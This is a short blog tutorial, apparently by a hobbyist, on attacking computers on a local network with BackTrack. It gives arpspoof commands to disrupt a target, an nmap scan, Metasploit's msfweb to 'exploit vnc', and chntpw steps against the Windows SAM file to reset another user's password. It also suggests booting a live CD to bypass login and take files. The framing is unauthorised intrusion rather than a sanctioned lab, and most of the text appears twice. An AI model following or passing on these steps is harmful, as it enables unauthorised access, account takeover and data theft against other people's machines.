Hi friends As i have been messing with Back Track OS since past two days and i have decided to post some Tutorial on hacking with Back Track .so here is a small trick on Back Track that allows you to hack any pc connected in lan and allow you to change password of remote PC.
At firstDisable internet connection of remote system
1. Arpspoof –i eth0 –t 192.168.1.1 192.168.1.2
2. Ctrl+2 to stop.
ThenMetasploit VNC
1. Nmap-> nmap 192.168.1.1
2. Backtrack -> penetration ->framework2 ->msfweb
3. Then copy [127.0.0.1:5555]
4. Open internet and paste it in url and then exploit vnc
Now Reset password on Win XP and Vista(old trick but still gold)
Start->Backtrack -> priviledge escalation ->password attacks-> chntpw
Chntpw: -i /mnt/hda1/windows/system32/config/SAM
1 (Enter)
Username (Enter)
1 (Enter)
Username (Enter)
4 (Enter)
1 (Enter)
Q (Enter)
Y (Enter)
Done :)
A note to the novice:- In case all you need is to get some files in the computer,then there's an easier method.Just boot via any live CD....This way the computer starts using the OS in the CD and the password protected OS is bypassed.Comment if you need info on this method.
I'll come up with a proper intro to backtrack in later articles
Tips:
If you want to be a backtracker create a live Bootable backtrack in your USB and use it more & more as you can.
If you want to be a backtracker create a live Bootable backtrack in your USB and use it more & more as you can.
Here we go the details :
At firstDisable internet connection of remote system
1. Arpspoof –i eth0 –t 192.168.1.1 192.168.1.2
2. Ctrl+2 to stop.
ThenMetasploit VNC
1. Nmap-> nmap 192.168.1.1
2. Backtrack -> penetration ->framework2 ->msfweb
3. Then copy [127.0.0.1:5555]
4. Open internet and paste it in url and then exploit vnc
Now Reset password on Win XP and Vista(old trick but still gold)
Start->Backtrack -> priviledge escalation ->password attacks-> chntpw
Chntpw: -i /mnt/hda1/windows/system32/config/SAM
1 (Enter)
Username (Enter)
1 (Enter)
Username (Enter)
4 (Enter)
1 (Enter)
Q (Enter)
Y (Enter)
Done :)
A note to the novice:- In case all you need is to get some files in the computer,then there's an easier method.Just boot via any live CD....This way the computer starts using the OS in the CD and the password protected OS is bypassed.Comment if you need info on this method.
I'll come up with a proper intro to backtrack in later articles
NOTE:-If all you want to do is get into the system and take out a few files....you can simply bypass the password protected OS with the live CD of some other OS(Example:-Ubuntu).
ReplyDelete